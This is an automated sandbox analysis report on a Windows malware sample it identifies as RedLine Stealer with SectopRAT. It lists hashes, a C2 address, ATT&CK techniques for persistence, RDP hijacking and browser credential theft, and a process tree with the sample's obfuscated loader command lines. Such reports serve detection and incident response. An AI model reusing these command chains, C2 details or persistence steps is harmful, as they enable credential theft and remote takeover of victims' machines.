redline | 02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27-12-2024 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34807a743f2d680eef051852eaef0b16.exe
Size

4.1MB
MD5

34807a743f2d680eef051852eaef0b16
SHA1

4e63843e9c51f907952bb2f51d6b3866f81f7bd6
SHA256

02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
SHA512

65acb9f797e244e62cbe9aafae8acb55dbecf88c7924b333e787d907226debfad8324649eb629bdac864dcaf8cea1139a56b1e7b48933fef314e2f040978166a
SSDEEP

98304:G1EESMlQ/9IsCMdegeFbD+dQ5oVOAoso2iFugO+Nthm5mBF:G1EEP42s1cgzKoVK2iFtOWHmOF

Score

10^/10

redline sectoprat adsbb defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

adsbb

21jhss.club:80

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral1/memory/1476-69-0x00000000000B0000-0x00000000000CC000-memory.dmp	family_redline
behavioral1/memory/1476-68-0x00000000000B0000-0x00000000000CC000-memory.dmp	family_redline
behavioral1/memory/1476-65-0x00000000000B0000-0x00000000000CC000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral1/memory/1476-69-0x00000000000B0000-0x00000000000CC000-memory.dmp	family_sectoprat
behavioral1/memory/1476-68-0x00000000000B0000-0x00000000000CC000-memory.dmp	family_sectoprat
behavioral1/memory/1476-65-0x00000000000B0000-0x00000000000CC000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
876	net.exe
2216	net1.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
29	2912	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
496	powershell.exe
1756	powershell.exe
1912	powershell.exe
2872	powershell.exe
3064	powershell.exe
1936	powershell.exe
2944	powershell.exe
1868	powershell.exe
2272	powershell.exe
2316	powershell.exe
1348	powershell.exe
2836	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1248	netsh.exe
2168	netsh.exe
1916	netsh.exe
3040	netsh.exe
2832	netsh.exe
2272	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Executes dropped EXE 13 IoCs

pid	Process
2960	Rifiutare.exe.com
2796	Rifiutare.exe.com
2908	Uno.exe.com
2768	Uno.exe.com
2624	Inebriato.exe.com
3040	Inebriato.exe.com
1476	RegAsm.exe
1940	RegAsm.exe
444	RegAsm.exe
2572	RDPWInst.exe
2992	RDPWInst.exe
2692	RDPWInst.exe
1576	RDPWInst.exe

Loads dropped DLL 15 IoCs

pid	Process
2732	cmd.exe
2732	cmd.exe
2732	cmd.exe
2796	Rifiutare.exe.com
3040	Inebriato.exe.com
1476	RegAsm.exe
2768	Uno.exe.com
1940	RegAsm.exe
444	RegAsm.exe
2376	cmd.exe
2376	cmd.exe
2840	Process not Found
2376	cmd.exe
2376	cmd.exe
1108	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com
21	raw.githubusercontent.com
22	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/444-84-0x00000000002C0000-0x000000000049F000-memory.dmp	autoit_exe
behavioral1/memory/444-89-0x00000000002C0000-0x000000000049F000-memory.dmp	autoit_exe
behavioral1/memory/444-86-0x00000000002C0000-0x000000000049F000-memory.dmp	autoit_exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.log	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	svchost.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\dnsrsvlr.log	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\asyncreg.log	svchost.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.chk	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb	svchost.exe

Hide Artifacts: Hidden Users 1 TTPs 3 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\spaiKmXGMX = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\spaiKmXGMX = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\spaiKmXGMX = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2796 set thread context of 1476	2796	Rifiutare.exe.com	46
PID 2768 set thread context of 1940	2768	Uno.exe.com	48
PID 3040 set thread context of 444	3040	Inebriato.exe.com	47

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wrapper	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
580	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uno.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	34807a743f2d680eef051852eaef0b16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	makecab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rifiutare.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uno.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1552	PING.EXE

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
2920	timeout.exe
1284	timeout.exe
1920	timeout.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1552	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2364	schtasks.exe
816	schtasks.exe
3012	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2944	powershell.exe
1912	powershell.exe
2836	powershell.exe
2872	powershell.exe
3064	powershell.exe
1868	powershell.exe
2316	powershell.exe
2272	powershell.exe
1108	svchost.exe
1108	svchost.exe
496	powershell.exe
1756	powershell.exe
1348	powershell.exe
1936	powershell.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
1108	svchost.exe
1108	svchost.exe
1108	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1476	RegAsm.exe
Token: SeIncreaseQuotaPrivilege	2572	WMIC.exe
Token: SeSecurityPrivilege	2572	WMIC.exe
Token: SeTakeOwnershipPrivilege	2572	WMIC.exe
Token: SeLoadDriverPrivilege	2572	WMIC.exe
Token: SeSystemProfilePrivilege	2572	WMIC.exe
Token: SeSystemtimePrivilege	2572	WMIC.exe
Token: SeProfSingleProcessPrivilege	2572	WMIC.exe
Token: SeIncBasePriorityPrivilege	2572	WMIC.exe
Token: SeCreatePagefilePrivilege	2572	WMIC.exe
Token: SeBackupPrivilege	2572	WMIC.exe
Token: SeRestorePrivilege	2572	WMIC.exe
Token: SeShutdownPrivilege	2572	WMIC.exe
Token: SeDebugPrivilege	2572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2572	WMIC.exe
Token: SeRemoteShutdownPrivilege	2572	WMIC.exe
Token: SeUndockPrivilege	2572	WMIC.exe
Token: SeManageVolumePrivilege	2572	WMIC.exe
Token: 33	2572	WMIC.exe
Token: 34	2572	WMIC.exe
Token: 35	2572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2572	WMIC.exe
Token: SeSecurityPrivilege	2572	WMIC.exe
Token: SeTakeOwnershipPrivilege	2572	WMIC.exe
Token: SeLoadDriverPrivilege	2572	WMIC.exe
Token: SeSystemProfilePrivilege	2572	WMIC.exe
Token: SeSystemtimePrivilege	2572	WMIC.exe
Token: SeProfSingleProcessPrivilege	2572	WMIC.exe
Token: SeIncBasePriorityPrivilege	2572	WMIC.exe
Token: SeCreatePagefilePrivilege	2572	WMIC.exe
Token: SeBackupPrivilege	2572	WMIC.exe
Token: SeRestorePrivilege	2572	WMIC.exe
Token: SeShutdownPrivilege	2572	WMIC.exe
Token: SeDebugPrivilege	2572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2572	WMIC.exe
Token: SeRemoteShutdownPrivilege	2572	WMIC.exe
Token: SeUndockPrivilege	2572	WMIC.exe
Token: SeManageVolumePrivilege	2572	WMIC.exe
Token: 33	2572	WMIC.exe
Token: 34	2572	WMIC.exe
Token: 35	2572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2996	WMIC.exe
Token: SeSecurityPrivilege	2996	WMIC.exe
Token: SeTakeOwnershipPrivilege	2996	WMIC.exe
Token: SeLoadDriverPrivilege	2996	WMIC.exe
Token: SeSystemProfilePrivilege	2996	WMIC.exe
Token: SeSystemtimePrivilege	2996	WMIC.exe
Token: SeProfSingleProcessPrivilege	2996	WMIC.exe
Token: SeIncBasePriorityPrivilege	2996	WMIC.exe
Token: SeCreatePagefilePrivilege	2996	WMIC.exe
Token: SeBackupPrivilege	2996	WMIC.exe
Token: SeRestorePrivilege	2996	WMIC.exe
Token: SeShutdownPrivilege	2996	WMIC.exe
Token: SeDebugPrivilege	2996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2996	WMIC.exe
Token: SeRemoteShutdownPrivilege	2996	WMIC.exe
Token: SeUndockPrivilege	2996	WMIC.exe
Token: SeManageVolumePrivilege	2996	WMIC.exe
Token: 33	2996	WMIC.exe
Token: 34	2996	WMIC.exe
Token: 35	2996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2996	WMIC.exe
Token: SeSecurityPrivilege	2996	WMIC.exe
Token: SeTakeOwnershipPrivilege	2996	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 3032	1968	34807a743f2d680eef051852eaef0b16.exe	30
PID 1968 wrote to memory of 3032	1968	34807a743f2d680eef051852eaef0b16.exe	30
PID 1968 wrote to memory of 3032	1968	34807a743f2d680eef051852eaef0b16.exe	30
PID 1968 wrote to memory of 3032	1968	34807a743f2d680eef051852eaef0b16.exe	30
PID 1968 wrote to memory of 2348	1968	34807a743f2d680eef051852eaef0b16.exe	32
PID 1968 wrote to memory of 2348	1968	34807a743f2d680eef051852eaef0b16.exe	32
PID 1968 wrote to memory of 2348	1968	34807a743f2d680eef051852eaef0b16.exe	32
PID 1968 wrote to memory of 2348	1968	34807a743f2d680eef051852eaef0b16.exe	32
PID 2348 wrote to memory of 2732	2348	cmd.exe	34
PID 2348 wrote to memory of 2732	2348	cmd.exe	34
PID 2348 wrote to memory of 2732	2348	cmd.exe	34
PID 2348 wrote to memory of 2732	2348	cmd.exe	34
PID 2732 wrote to memory of 2848	2732	cmd.exe	35
PID 2732 wrote to memory of 2848	2732	cmd.exe	35
PID 2732 wrote to memory of 2848	2732	cmd.exe	35
PID 2732 wrote to memory of 2848	2732	cmd.exe	35
PID 2732 wrote to memory of 2960	2732	cmd.exe	36
PID 2732 wrote to memory of 2960	2732	cmd.exe	36
PID 2732 wrote to memory of 2960	2732	cmd.exe	36
PID 2732 wrote to memory of 2960	2732	cmd.exe	36
PID 2732 wrote to memory of 2836	2732	cmd.exe	37
PID 2732 wrote to memory of 2836	2732	cmd.exe	37
PID 2732 wrote to memory of 2836	2732	cmd.exe	37
PID 2732 wrote to memory of 2836	2732	cmd.exe	37
PID 2960 wrote to memory of 2796	2960	Rifiutare.exe.com	38
PID 2960 wrote to memory of 2796	2960	Rifiutare.exe.com	38
PID 2960 wrote to memory of 2796	2960	Rifiutare.exe.com	38
PID 2960 wrote to memory of 2796	2960	Rifiutare.exe.com	38
PID 2732 wrote to memory of 2908	2732	cmd.exe	39
PID 2732 wrote to memory of 2908	2732	cmd.exe	39
PID 2732 wrote to memory of 2908	2732	cmd.exe	39
PID 2732 wrote to memory of 2908	2732	cmd.exe	39
PID 2908 wrote to memory of 2768	2908	Uno.exe.com	41
PID 2908 wrote to memory of 2768	2908	Uno.exe.com	41
PID 2908 wrote to memory of 2768	2908	Uno.exe.com	41
PID 2908 wrote to memory of 2768	2908	Uno.exe.com	41
PID 2732 wrote to memory of 1752	2732	cmd.exe	40
PID 2732 wrote to memory of 1752	2732	cmd.exe	40
PID 2732 wrote to memory of 1752	2732	cmd.exe	40
PID 2732 wrote to memory of 1752	2732	cmd.exe	40
PID 2732 wrote to memory of 2624	2732	cmd.exe	42
PID 2732 wrote to memory of 2624	2732	cmd.exe	42
PID 2732 wrote to memory of 2624	2732	cmd.exe	42
PID 2732 wrote to memory of 2624	2732	cmd.exe	42
PID 2624 wrote to memory of 3040	2624	Inebriato.exe.com	44
PID 2624 wrote to memory of 3040	2624	Inebriato.exe.com	44
PID 2624 wrote to memory of 3040	2624	Inebriato.exe.com	44
PID 2624 wrote to memory of 3040	2624	Inebriato.exe.com	44
PID 2732 wrote to memory of 1552	2732	cmd.exe	43
PID 2732 wrote to memory of 1552	2732	cmd.exe	43
PID 2732 wrote to memory of 1552	2732	cmd.exe	43
PID 2732 wrote to memory of 1552	2732	cmd.exe	43
PID 2796 wrote to memory of 1476	2796	Rifiutare.exe.com	46
PID 2796 wrote to memory of 1476	2796	Rifiutare.exe.com	46
PID 2796 wrote to memory of 1476	2796	Rifiutare.exe.com	46
PID 2796 wrote to memory of 1476	2796	Rifiutare.exe.com	46
PID 2796 wrote to memory of 1476	2796	Rifiutare.exe.com	46
PID 2796 wrote to memory of 1476	2796	Rifiutare.exe.com	46
PID 2796 wrote to memory of 1476	2796	Rifiutare.exe.com	46
PID 2796 wrote to memory of 1476	2796	Rifiutare.exe.com	46
PID 3040 wrote to memory of 444	3040	Inebriato.exe.com	47
PID 3040 wrote to memory of 444	3040	Inebriato.exe.com	47
PID 3040 wrote to memory of 444	3040	Inebriato.exe.com	47
PID 3040 wrote to memory of 444	3040	Inebriato.exe.com	47

C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe
"C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\SysWOW64\makecab.exe
  "C:\Windows\System32\makecab.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3032
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2732
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:2848
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
      Rifiutare.exe.com D
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2960
